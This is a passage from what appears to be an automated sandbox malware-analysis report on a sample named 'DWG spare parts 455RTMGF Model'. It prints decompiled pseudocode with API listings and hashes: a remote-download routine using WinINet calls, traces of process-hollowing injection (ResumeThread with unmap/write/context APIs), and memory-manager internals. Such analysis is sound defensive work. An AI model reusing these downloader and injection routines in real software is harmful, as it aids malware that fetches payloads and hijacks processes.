                                                                • ResumeThread.KERNEL32(000005B4,000005B4,0256D3A0,000005C8,00400000,00000000,0007F000,0256D47C,000005C8,00400000,0007F000,00003000,00000040,000005C8,003A1FF8,0256D474), ref: 02524AFF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocProcessThreadVirtual$ContextMemory$CreateReadResumeSectionUnmapViewWrite
                                                                • String ID:
                                                                • API String ID: 995461784-0
                                                                • Opcode ID: d5b197189182a3d67caaaf1742a72bd754fae0c4b3734115903ebf6d920376f7
                                                                • Instruction ID: df7d2134fc4f91182f1023e49ed1a5ebbfd382369e86a4169b791f8ba4a45bc3
                                                                • Opcode Fuzzy Hash: d5b197189182a3d67caaaf1742a72bd754fae0c4b3734115903ebf6d920376f7
                                                                • Instruction Fuzzy Hash: 995114B0B92200AFE748DE6DD889E2A37B9BB89705F484D14F544D7680C7B4EC289B1C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                C-Code - Quality: 59%
                                                                			E02525974(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
                                                                				char _v8;
                                                                				char* _t20;
                                                                				void* _t21;
                                                                				void* _t22;
                                                                				void* _t24;
                                                                				void* _t27;
                                                                				void* _t34;
                                                                				void* _t37;
                                                                				long _t43;
                                                                				intOrPtr _t48;
                                                                				intOrPtr _t49;
                                                                				intOrPtr _t51;
                                                                				intOrPtr _t52;
                                                                				void* _t54;
                                                                				intOrPtr _t56;
                                                                				intOrPtr _t57;
                                                                
                                                                				_t56 = _t57;
                                                                				_push(0);
                                                                				_t37 = __edx;
                                                                				_t54 = __eax;
                                                                				_push(_t56);
                                                                				_push(0x2525ab2);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t57;
                                                                				E025148A0(__edx);
                                                                				E0251304C(0x64);
                                                                				E02517C64( &_v8);
                                                                				 *0x256d4cc = InternetOpenA(E02514D64(_v8), 0, 0, 0, 0);
                                                                				if( *0x256d4cc == 0) {
                                                                					__eflags = 0;
                                                                					_pop(_t48);
                                                                					 *[fs:eax] = _t48;
                                                                					_push(E02525AB9);
                                                                					return E025148A0( &_v8);
                                                                				} else {
                                                                					_push(_t56);
                                                                					_push(0x2525a95);
                                                                					_push( *[fs:eax]);
                                                                					 *[fs:eax] = _t57;
                                                                					_t20 = E02514D64(_t54);
                                                                					_t21 =  *0x256d4cc; // 0xcc0004
                                                                					_t22 = InternetOpenUrlA(_t21, _t20, 0, 0, 0x4000000, 0); // executed
                                                                					 *0x256d4d0 = _t22;
                                                                					if( *0x256d4d0 == 0) {
                                                                						__eflags = 0;
                                                                						_pop(_t49);
                                                                						 *[fs:eax] = _t49;
                                                                						_push(0x2525a9c);
                                                                						_t24 =  *0x256d4cc; // 0xcc0004
                                                                						return InternetCloseHandle(_t24);
                                                                					} else {
                                                                						_push(_t56);
                                                                						_push(0x2525a75);
                                                                						_push( *[fs:eax]);
                                                                						 *[fs:eax] = _t57;
                                                                						do {
                                                                							_t27 =  *0x256d4d0; // 0xcc000c
                                                                							InternetReadFile(_t27, 0x256d4d4, 0x401, 0x256d8d8); // executed
                                                                							_t43 =  *0x256d8d8; // 0x0
                                                                							E02514990(0x256da7c, _t43, 0x256d4d4, 0);
                                                                							_t51 =  *0x256da7c; // 0x0
                                                                							E02514B6C(_t37, _t51);
                                                                						} while ( *0x256d8d8 != 0);
                                                                						_pop(_t52);
                                                                						 *[fs:eax] = _t52;
                                                                						_push(0x2525a7c);
                                                                						_t34 =  *0x256d4d0; // 0xcc000c
                                                                						return InternetCloseHandle(_t34);
                                                                					}
                                                                				}
                                                                			}




















                                                                APIs
                                                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 025259B8
                                                                • InternetOpenUrlA.WININET(00CC0004,00000000,00000000,00000000,04000000,00000000), ref: 025259F6
                                                                • InternetReadFile.WININET(00CC000C,0256D4D4,00000401,0256D8D8), ref: 02525A2C
                                                                • InternetCloseHandle.WININET(00CC000C), ref: 02525A6F
                                                                • InternetCloseHandle.WININET(00CC0004), ref: 02525A8F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                • String ID:
                                                                • API String ID: 3121278467-0
                                                                • Opcode ID: ae960e49e35cff05edebd2255b72e91e0afbf8ba6525054102531904b5bd00cd
                                                                • Instruction ID: 0bb42476237b219f2de2e2d5f17e4161454f5a686291814022291dd1e4ade3fb
                                                                • Opcode Fuzzy Hash: ae960e49e35cff05edebd2255b72e91e0afbf8ba6525054102531904b5bd00cd
                                                                • Instruction Fuzzy Hash: 2C318D70784341AEF7199B68DC9AB2937AAF789B11F914C61F10097AC0E7B5AC18DB1C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                C-Code - Quality: 100%
                                                                			E0252521C(void* __eax) {
                                                                				void* _t2;
                                                                				char* _t4;
                                                                				void* _t5;
                                                                				void* _t6;
                                                                				void* _t8;
                                                                				intOrPtr _t12;
                                                                				void* _t14;
                                                                				void* _t16;
                                                                				void* _t19;
                                                                				intOrPtr _t20;
                                                                
                                                                				_t19 = __eax;
                                                                				_t2 = InternetOpenA("lVali", 4, 0, 0, 0); // executed
                                                                				 *0x256daa4 = _t2;
                                                                				_t4 = E02514D64(_t19);
                                                                				_t5 =  *0x256daa4; // 0xcc0004
                                                                				_t6 = InternetOpenUrlA(_t5, _t4, 0, 0, 0x200, 0); // executed
                                                                				 *0x256daa8 = _t6;
                                                                				if( *0x256daa8 != 0) {
                                                                					 *0x256dcb0 = 0;
                                                                					 *0x256dcb4 = 0x201;
                                                                					_t8 =  *0x256daa8; // 0xcc000c
                                                                					 *0x256dcb8 = HttpQueryInfoA(_t8, 0x13, "200", 0x256dcb4, 0x256dcb0);
                                                                					__eflags =  *0x256dcb8;
                                                                					if( *0x256dcb8 != 0) {
                                                                						E02514B10(0x256dcbc, 0x201, 0x256daac);
                                                                						_t12 =  *0x256dcbc; // 0x2a51b78
                                                                						E02514CB0(_t12, 0x25252fc);
                                                                						if(__eflags != 0) {
                                                                							_t20 = 0;
                                                                							__eflags = 0;
                                                                						} else {
                                                                							_t20 = 1;
                                                                						}
                                                                					} else {
                                                                						_t20 = 0;
                                                                					}
                                                                					_t14 =  *0x256daa8; // 0xcc000c
                                                                					InternetCloseHandle(_t14);
                                                                				} else {
                                                                					_t20 = 0;
                                                                				}
                                                                				_t16 =  *0x256daa4; // 0xcc0004
                                                                				InternetCloseHandle(_t16);
                                                                				return _t20;
                                                                			}














                                                                APIs
                                                                • InternetOpenA.WININET(lVali,00000004,00000000,00000000,00000000), ref: 0252522C
                                                                • InternetOpenUrlA.WININET(00CC0004,00000000,00000000,00000000,00000200,00000000), ref: 0252524F
                                                                • HttpQueryInfoA.WININET(00CC000C,00000013,200,0256DCB4,0256DCB0), ref: 0252528E
                                                                • InternetCloseHandle.WININET(00CC000C), ref: 025252D6
                                                                • InternetCloseHandle.WININET(00CC0004), ref: 025252E1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Internet$CloseHandleOpen$HttpInfoQuery
                                                                • String ID: 200$200$lVali
                                                                • API String ID: 3871184103-2774994813
                                                                • Opcode ID: 49641683b32eed044a59167b472cbf0305e2c3e9dce59ca401e797059a54b5f2
                                                                • Instruction ID: 5b614a8c29ecab13e201a89af31acdd2fcff5b80f06b46717ce41cc8a026b4a4
                                                                • Opcode Fuzzy Hash: 49641683b32eed044a59167b472cbf0305e2c3e9dce59ca401e797059a54b5f2
                                                                • Instruction Fuzzy Hash: 52113A71BCE3056EFB10AFB89989B1236A6B749704F541D25F2009B6C0EAE6D4589B0C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                C-Code - Quality: 67%
                                                                			E02511754(signed int __eax) {
                                                                				signed int __ebx;
                                                                				signed int __edi;
                                                                				signed int __esi;
                                                                				void* _t96;
                                                                				void** _t99;
                                                                				signed int _t104;
                                                                				signed int _t109;
                                                                				signed int _t110;
                                                                				intOrPtr* _t114;
                                                                				void* _t116;
                                                                				void* _t121;
                                                                				signed int _t125;
                                                                				signed int _t129;
                                                                				signed int _t131;
                                                                				signed int _t132;
                                                                				signed int _t133;
                                                                				signed int _t134;
                                                                				signed int _t135;
                                                                				unsigned int _t141;
                                                                				signed int _t142;
                                                                				void* _t144;
                                                                				void* _t147;
                                                                				intOrPtr _t148;
                                                                				signed int _t150;
                                                                				long _t156;
                                                                				intOrPtr _t159;
                                                                				signed int _t162;
                                                                
                                                                				_t129 =  *0x256a045; // 0x0
                                                                				if(__eax > 0xa2c) {
                                                                					__eflags = __eax - 0x40a2c;
                                                                					if(__eax > 0x40a2c) {
                                                                						_pop(_t120);
                                                                						__eflags = __eax;
                                                                						if(__eax >= 0) {
                                                                							_push(_t120);
                                                                							_t162 = __eax;
                                                                							_t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
                                                                							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
                                                                							_t121 = _t96;
                                                                							if(_t121 != 0) {
                                                                								_t147 = _t121;
                                                                								 *((intOrPtr*)(_t147 + 8)) = _t162;
                                                                								 *(_t147 + 0xc) = _t156 | 0x00000004;
                                                                								E02511674();
                                                                								_t99 =  *0x256c7a8; // 0x7ef90000
                                                                								 *_t147 = 0x256c7a4;
                                                                								 *0x256c7a8 = _t121;
                                                                								 *(_t147 + 4) = _t99;
                                                                								 *_t99 = _t121;
                                                                								 *0x256c7a0 = 0;
                                                                								_t121 = _t121 + 0x10;
                                                                							}
                                                                							return _t121;
                                                                						} else {
                                                                							__eflags = 0;
                                                                							return 0;
                                                                						}
                                                                					} else {
                                                                						_t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30;
                                                                						__eflags = _t129;
                                                                						if(__eflags != 0) {
                                                                							while(1) {
                                                                								asm("lock cmpxchg [0x256a710], ah");
                                                                								if(__eflags == 0) {
                                                                									goto L39;
                                                                								}
                                                                								Sleep(0);
                                                                								asm("lock cmpxchg [0x256a710], ah");
                                                                								if(__eflags != 0) {
                                                                									Sleep(0xa);
                                                                									continue;
                                                                								}
                                                                								goto L39;
                                                                							}
                                                                						}
                                                                						L39:
                                                                						_t141 = _t125 - 0xb30;
                                                                						_t142 = _t141 >> 0xd;
                                                                						_t131 = _t141 >> 8;
                                                                						_t104 = 0xffffffff << _t131 &  *(0x256a720 + _t142 * 4);
                                                                						__eflags = 0xffffffff;
                                                                						if(0xffffffff == 0) {
                                                                							_t132 = _t142;
                                                                							__eflags = 0xfffffffe << _t132 &  *0x256a71c;
                                                                							if((0xfffffffe << _t132 &  *0x256a71c) == 0) {
                                                                								_t133 =  *0x256a718; // 0x84dc0
                                                                								_t134 = _t133 - _t125;
                                                                								__eflags = _t134;
                                                                								if(_t134 < 0) {
                                                                									_t109 = E025115FC(_t125);
                                                                								} else {
                                                                									_t110 =  *0x256a714; // 0x29a4dd0
                                                                									_t109 = _t110 - _t125;
                                                                									 *0x256a714 = _t109;
                                                                									 *0x256a718 = _t134;
                                                                									 *(_t109 - 4) = _t125 | 0x00000002;
                                                                								}
                                                                								 *0x256a710 = 0;
                                                                								return _t109;
                                                                							} else {
                                                                								asm("bsf edx, eax");
                                                                								asm("bsf ecx, eax");
                                                                								_t135 = _t132 | _t142 << 0x00000005;
                                                                								goto L47;
                                                                							}
                                                                						} else {
                                                                							asm("bsf eax, eax");
                                                                							_t135 = _t131 & 0xffffffe0 | _t104;
                                                                							L47:
                                                                							_push(_t152);
                                                                							_push(_t145);
                                                                							_t148 = 0x256a7a0 + _t135 * 8;
                                                                							_t159 =  *((intOrPtr*)(_t148 + 4));
                                                                							_t114 =  *((intOrPtr*)(_t159 + 4));
                                                                							 *((intOrPtr*)(_t148 + 4)) = _t114;
                                                                							 *_t114 = _t148;
                                                                							__eflags = _t148 - _t114;
                                                                							if(_t148 == _t114) {
                                                                								asm("rol eax, cl");
                                                                								_t80 = 0x256a720 + _t142 * 4;
                                                                								 *_t80 =  *(0x256a720 + _t142 * 4) & 0xfffffffe;
                                                                								__eflags =  *_t80;
                                                                								if( *_t80 == 0) {
                                                                									asm("btr [0x256a71c], edx");
                                                                								}
                                                                							}
                                                                							_t150 = 0xfffffff0 &  *(_t159 - 4);
                                                                							_t144 = 0xfffffff0 - _t125;
                                                                							__eflags = 0xfffffff0;
                                                                							if(0xfffffff0 == 0) {
                                                                								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
                                                                								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
                                                                								__eflags =  *_t89;
                                                                							} else {
                                                                								_t116 = _t125 + _t159;
                                                                								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
                                                                								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
                                                                								__eflags = 0xfffffff0 - 0xb30;
                                                                								if(0xfffffff0 >= 0xb30) {
                                                                									E02511530(_t116, 0xfffffffffffffff3, _t144);
                                                                								}
                                                                							}
                                                                							 *(_t159 - 4) = _t125 + 2;
                                                                							 *0x256a710 = 0;
                                                                							return _t159;
                                                                						}
                                                                					}
                                                                				} else {
                                                                					__eflags = __cl;
                                                                					__eax =  *(__edx + 0x256a5b8) & 0x000000ff;
                                                                					__ebx = 0x252d044 + ( *(__edx + 0x256a5b8) & 0x000000ff) * 8;
                                                                					if(__eflags != 0) {
                                                                						while(1) {
                                                                							__eax = 0x100;
                                                                							asm("lock cmpxchg [ebx], ah");
                                                                							if(__eflags == 0) {
                                                                								goto L5;
                                                                							}
                                                                							__ebx = __ebx + 0x20;
                                                                							__eflags = __ebx;
                                                                							__eax = 0x100;
                                                                							asm("lock cmpxchg [ebx], ah");
                                                                							if(__ebx != 0) {
                                                                								__ebx = __ebx + 0x20;
                                                                								__eflags = __ebx;
                                                                								__eax = 0x100;
                                                                								asm("lock cmpxchg [ebx], ah");
                                                                								if(__ebx != 0) {
                                                                									__ebx = __ebx - 0x40;
                                                                									__eflags = __ebx;
                                                                									Sleep(0);
                                                                									__eax = 0x100;
                                                                									asm("lock cmpxchg [ebx], ah");
                                                                									if(__eflags != 0) {
                                                                										Sleep(0xa);
                                                                										continue;
                                                                									}
                                                                								}
                                                                							}
                                                                							goto L5;
                                                                						}
                                                                					}
                                                                					L5:
                                                                					__edx =  *(__ebx + 4);
                                                                					__eax =  *(__edx + 8);
                                                                					__ecx = 0xfffffff8;
                                                                					__eflags = __edx - __ebx;
                                                                					if(__edx == __ebx) {
                                                                						__edx =  *(__ebx + 0x10);
                                                                						__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                                						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
                                                                						__eflags = __eax -  *(__ebx + 0xc);
                                                                						if(__eax >  *(__ebx + 0xc)) {
                                                                							_push(__esi);
                                                                							_push(__edi);
                                                                							__eflags =  *0x256a045;
                                                                							if(__eflags != 0) {
                                                                								while(1) {
                                                                									__eax = 0x100;
                                                                									asm("lock cmpxchg [0x256a710], ah");
                                                                									if(__eflags == 0) {
                                                                										goto L20;
                                                                									}
                                                                									Sleep(0);
                                                                									__eax = 0x100;
                                                                									asm("lock cmpxchg [0x256a710], ah");
                                                                									if(__eflags != 0) {
                                                                										Sleep(0xa);
                                                                										continue;
                                                                									}
                                                                									goto L20;
                                                                								}
                                                                							}
                                                                							L20:
                                                                							 *(__ebx + 1) =  *(__ebx + 1) &  *0x256a71c;
                                                                							__eflags =  *(__ebx + 1) &  *0x256a71c;
                                                                							if(( *(__ebx + 1) &  *0x256a71c) == 0) {
                                                                								__ecx =  *(__ebx + 0x18) & 0x0000ffff;
                                                                								__edi =  *0x256a718; // 0x84dc0
                                                                								__eflags = __edi - ( *(__ebx + 0x18) & 0x0000ffff);
                                                                								if(__edi < ( *(__ebx + 0x18) & 0x0000ffff)) {
                                                                									__eax =  *(__ebx + 0x1a) & 0x0000ffff;
                                                                									__edi = __eax;
                                                                									__eax = E025115FC(__eax);
                                                                									__esi = __eax;
                                                                									__eflags = __eax;
                                                                									if(__eax != 0) {
                                                                										goto L33;
                                                                									} else {
                                                                										 *0x256a710 = __al;
                                                                										 *__ebx = __al;
                                                                										_pop(__edi);
                                                                										_pop(__esi);
                                                                										_pop(__ebx);
                                                                										return __eax;
                                                                									}
                                                                								} else {
                                                                									__esi =  *0x256a714; // 0x29a4dd0
                                                                									__ecx =  *(__ebx + 0x1a) & 0x0000ffff;
                                                                									__edx = __ecx + 0xb30;
                                                                									__eflags = __edi - __ecx + 0xb30;
                                                                									if(__edi >= __ecx + 0xb30) {
                                                                										__edi = __ecx;
                                                                									}
                                                                									__esi = __esi - __edi;
                                                                									 *0x256a718 =  *0x256a718 - __edi;
                                                                									 *0x256a714 = __esi;
                                                                									goto L33;
                                                                								}
                                                                							} else {
                                                                								asm("bsf eax, esi");
                                                                								__esi = __eax * 8;
                                                                								__ecx =  *(0x256a720 + __eax * 4);
                                                                								asm("bsf ecx, ecx");
                                                                								__ecx =  *(0x256a720 + __eax * 4) + __eax * 8 * 4;
                                                                								__edi = 0x256a7a0 + ( *(0x256a720 + __eax * 4) + __eax * 8 * 4) * 8;
                                                                								__esi =  *(__edi + 4);
                                                                								__edx =  *(__esi + 4);
                                                                								 *(__edi + 4) = __edx;
                                                                								 *__edx = __edi;
                                                                								__eflags = __edi - __edx;
                                                                								if(__edi == __edx) {
                                                                									__edx = 0xfffffffe;
                                                                									asm("rol edx, cl");
                                                                									_t38 = 0x256a720 + __eax * 4;
                                                                									 *_t38 =  *(0x256a720 + __eax * 4) & 0xfffffffe;
                                                                									__eflags =  *_t38;
                                                                									if( *_t38 == 0) {
                                                                										asm("btr [0x256a71c], eax");
                                                                									}
                                                                								}
                                                                								__edi = 0xfffffff0;
                                                                								__edi = 0xfffffff0 &  *(__esi - 4);
                                                                								__eflags = 0xfffffff0 - 0x10a60;
                                                                								if(0xfffffff0 < 0x10a60) {
                                                                									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
                                                                									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
                                                                									__eflags =  *_t52;
                                                                								} else {
                                                                									__edx = __edi;
                                                                									__edi =  *(__ebx + 0x1a) & 0x0000ffff;
                                                                									__edx = __edx - __edi;
                                                                									__eax = __edi + __esi;
                                                                									__ecx = __edx + 3;
                                                                									 *(__eax - 4) = __ecx;
                                                                									 *(__edx + __eax - 8) = __edx;
                                                                									__eax = E02511530(__eax, __ecx, __edx);
                                                                								}
                                                                								L33:
                                                                								_t56 = __edi + 6; // 0x84dc6
                                                                								__ecx = _t56;
                                                                								 *(__esi - 4) = _t56;
                                                                								__eax = 0;
                                                                								 *0x256a710 = __al;
                                                                								 *__esi = __ebx;
                                                                								 *((intOrPtr*)(__esi + 8)) = 0;
                                                                								 *((intOrPtr*)(__esi + 0xc)) = 1;
                                                                								 *(__ebx + 0x10) = __esi;
                                                                								_t61 = __esi + 0x20; // 0x29a4df0
                                                                								__eax = _t61;
                                                                								__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                                								__edx = __ecx + __eax;
                                                                								 *(__ebx + 8) = __ecx + __eax;
                                                                								__edi = __edi + __esi;
                                                                								__edi = __edi - __ecx;
                                                                								__eflags = __edi;
                                                                								 *(__ebx + 0xc) = __edi;
                                                                								 *__ebx = 0;
                                                                								 *(__eax - 4) = __esi;
                                                                								_pop(__edi);
                                                                								_pop(__esi);
                                                                								_pop(__ebx);
                                                                								return __eax;
                                                                							}
                                                                						} else {
                                                                							_t19 = __edx + 0xc;
                                                                							 *_t19 =  *(__edx + 0xc) + 1;
                                                                							__eflags =  *_t19;
                                                                							 *(__ebx + 8) = __ecx;
                                                                							 *__ebx = 0;
                                                                							 *(__eax - 4) = __edx;
                                                                							_pop(__ebx);
                                                                							return __eax;
                                                                						}
                                                                					} else {
                                                                						 *(__edx + 0xc) =  *(__edx + 0xc) + 1;
                                                                						__ecx = 0xfffffff8 &  *(__eax - 4);
                                                                						__eflags = 0xfffffff8;
                                                                						 *(__edx + 8) = 0xfffffff8 &  *(__eax - 4);
                                                                						 *(__eax - 4) = __edx;
                                                                						if(0xfffffff8 == 0) {
                                                                							__ecx =  *(__edx + 4);
                                                                							 *(__ecx + 0x14) = __ebx;
                                                                							 *(__ebx + 4) = __ecx;
                                                                							 *__ebx = 0;
                                                                							_pop(__ebx);
                                                                							return __eax;
                                                                						} else {
                                                                							 *__ebx = 0;
                                                                							_pop(__ebx);
                                                                							return __eax;
                                                                						}
                                                                					}
                                                                				}
                                                                			}































                                                                APIs
                                                                • Sleep.KERNEL32(00000000), ref: 02511800
                                                                • Sleep.KERNEL32(0000000A,00000000), ref: 02511816
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 657b4b38884e583c60f6f39a7ad79780a26956d45491f53fc7ecb79693144edf
                                                                • Instruction ID: 112f6e373ae3ccd05ae868ace07f8898ed4745737df4bbd7bd6819534ae40106
                                                                • Opcode Fuzzy Hash: 657b4b38884e583c60f6f39a7ad79780a26956d45491f53fc7ecb79693144edf
                                                                • Instruction Fuzzy Hash: 7FB13372A00A518BE715CF2CE498365BFE1FB80320F08C6EED65A9B385C7709855CB98
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 91%
                                                                			E02511ABC(void* __eax, void* __edi) {
                                                                				signed int __ebx;
                                                                				void* _t50;
                                                                				signed int _t51;
                                                                				signed int _t52;
                                                                				signed int _t54;
                                                                				void _t57;
                                                                				int _t58;
                                                                				signed int _t65;
                                                                				void* _t67;
                                                                				signed int _t69;
                                                                				intOrPtr _t70;
                                                                				signed int _t75;
                                                                				signed int _t76;
                                                                				signed int _t77;
                                                                				void* _t79;
                                                                				void* _t82;
                                                                				void _t85;
                                                                				void* _t87;
                                                                				void* _t89;
                                                                
                                                                				_t48 = __eax;
                                                                				_t77 =  *(__eax - 4);
                                                                				_t65 =  *0x256a045; // 0x0
                                                                				if((_t77 & 0x00000007) != 0) {
                                                                					__eflags = _t77 & 0x00000005;
                                                                					if((_t77 & 0x00000005) != 0) {
                                                                						_pop(_t65);
                                                                						__eflags = _t77 & 0x00000003;
                                                                						if((_t77 & 0x00000003) != 0) {
                                                                							return 0xffffffff;
                                                                						} else {
                                                                							_push(_t65);
                                                                							_t67 = __eax - 0x10;
                                                                							E02511674();
                                                                							_t50 = _t67;
                                                                							_t85 =  *_t50;
                                                                							_t82 =  *(_t50 + 4);
                                                                							_t51 = VirtualFree(_t67, 0, 0x8000); // executed
                                                                							if(_t51 == 0) {
                                                                								_t52 = _t51 | 0xffffffff;
                                                                								__eflags = _t52;
                                                                							} else {
                                                                								 *_t82 = _t85;
                                                                								 *(_t85 + 4) = _t82;
                                                                								_t52 = 0;
                                                                							}
                                                                							 *0x256c7a0 = 0;
                                                                							return _t52;
                                                                						}
                                                                					} else {
                                                                						goto L21;
                                                                					}
                                                                				} else {
                                                                					__eflags = __bl;
                                                                					__ebx =  *__edx;
                                                                					if(__eflags != 0) {
                                                                						while(1) {
                                                                							__eax = 0x100;
                                                                							asm("lock cmpxchg [ebx], ah");
                                                                							if(__eflags == 0) {
                                                                								goto L6;
                                                                							}
                                                                							Sleep(0);
                                                                							__edx = __edx;
                                                                							__ecx = __ecx;
                                                                							__eax = 0x100;
                                                                							asm("lock cmpxchg [ebx], ah");
                                                                							if(__eflags != 0) {
                                                                								Sleep(0xa);
                                                                								__edx = __edx;
                                                                								__ecx = __ecx;
                                                                								continue;
                                                                							}
                                                                							goto L6;
                                                                						}
                                                                					}
                                                                					L6:
                                                                					_t6 = __edx + 0xc;
                                                                					 *_t6 =  *(__edx + 0xc) - 1;
                                                                					__eflags =  *_t6;
                                                                					__eax =  *(__edx + 8);
                                                                					if( *_t6 == 0) {
                                                                						__eflags = __eax;
                                                                						if(__eax == 0) {
                                                                							L12:
                                                                							 *(__ebx + 0xc) = __eax;
                                                                						} else {
                                                                							__eax =  *(__edx + 0x14);
                                                                							__ecx =  *(__edx + 4);
                                                                							 *(__eax + 4) = __ecx;
                                                                							 *(__ecx + 0x14) = __eax;
                                                                							__eax = 0;
                                                                							__eflags =  *((intOrPtr*)(__ebx + 0x10)) - __edx;
                                                                							if( *((intOrPtr*)(__ebx + 0x10)) == __edx) {
                                                                								goto L12;
                                                                							}
                                                                						}
                                                                						 *__ebx = __al;
                                                                						__eax = __edx;
                                                                						__edx =  *(__edx - 4);
                                                                						__bl =  *0x256a045; // 0x0
                                                                						L21:
                                                                						__eflags = _t65;
                                                                						_t69 = _t77 & 0xfffffff0;
                                                                						_push(_t84);
                                                                						_t87 = _t48;
                                                                						if(__eflags != 0) {
                                                                							while(1) {
                                                                								_t54 = 0x100;
                                                                								asm("lock cmpxchg [0x256a710], ah");
                                                                								if(__eflags == 0) {
                                                                									goto L22;
                                                                								}
                                                                								Sleep(0);
                                                                								_t54 = 0x100;
                                                                								asm("lock cmpxchg [0x256a710], ah");
                                                                								if(__eflags != 0) {
                                                                									Sleep(0xa);
                                                                									continue;
                                                                								}
                                                                								goto L22;
                                                                							}
                                                                						}
                                                                						L22:
                                                                						__eflags = (_t87 - 4)[_t69] & 0x00000001;
                                                                						_t75 = (_t87 - 4)[_t69];
                                                                						if(((_t87 - 4)[_t69] & 0x00000001) != 0) {
                                                                							_t54 = _t69 + _t87;
                                                                							_t76 = _t75 & 0xfffffff0;
                                                                							_t69 = _t69 + _t76;
                                                                							__eflags = _t76 - 0xb30;
                                                                							if(_t76 >= 0xb30) {
                                                                								_t54 = E025114F0(_t54);
                                                                							}
                                                                						} else {
                                                                							_t76 = _t75 | 0x00000008;
                                                                							__eflags = _t76;
                                                                							(_t87 - 4)[_t69] = _t76;
                                                                						}
                                                                						__eflags =  *(_t87 - 4) & 0x00000008;
                                                                						if(( *(_t87 - 4) & 0x00000008) != 0) {
                                                                							_t76 =  *(_t87 - 8);
                                                                							_t87 = _t87 - _t76;
                                                                							_t69 = _t69 + _t76;
                                                                							__eflags = _t76 - 0xb30;
                                                                							if(_t76 >= 0xb30) {
                                                                								_t54 = E025114F0(_t87);
                                                                							}
                                                                						}
                                                                						__eflags = _t69 - 0x13fff0;
                                                                						if(_t69 == 0x13fff0) {
                                                                							__eflags =  *0x256a718 - 0x13fff0;
                                                                							if( *0x256a718 != 0x13fff0) {
                                                                								_t70 = _t87 + 0x13fff0;
                                                                								E02511590(_t54);
                                                                								 *((intOrPtr*)(_t70 - 4)) = 2;
                                                                								 *0x256a718 = 0x13fff0;
                                                                								 *0x256a714 = _t70;
                                                                								 *0x256a710 = 0;
                                                                								__eflags = 0;
                                                                								return 0;
                                                                							} else {
                                                                								_t89 = _t87 - 0x10;
                                                                								_t57 =  *_t89;
                                                                								_t79 =  *(_t89 + 4);
                                                                								 *(_t57 + 4) = _t79;
                                                                								 *_t79 = _t57;
                                                                								 *0x256a710 = 0;
                                                                								_t58 = VirtualFree(_t89, 0, 0x8000);
                                                                								__eflags = _t58 - 1;
                                                                								asm("sbb eax, eax");
                                                                								return _t58;
                                                                							}
                                                                						} else {
                                                                							 *(_t87 - 4) = _t69 + 3;
                                                                							 *(_t87 - 8 + _t69) = _t69;
                                                                							E02511530(_t87, _t76, _t69);
                                                                							 *0x256a710 = 0;
                                                                							__eflags = 0;
                                                                							return 0;
                                                                						}
                                                                					} else {
                                                                						__eflags = __eax;
                                                                						 *(__edx + 8) = __ecx;
                                                                						 *(__ecx - 4) = __eax;
                                                                						if(__eflags == 0) {
                                                                							__ecx =  *(__ebx + 4);
                                                                							 *(__edx + 0x14) = __ebx;
                                                                							 *(__edx + 4) = __ecx;
                                                                							 *(__ecx + 0x14) = __edx;
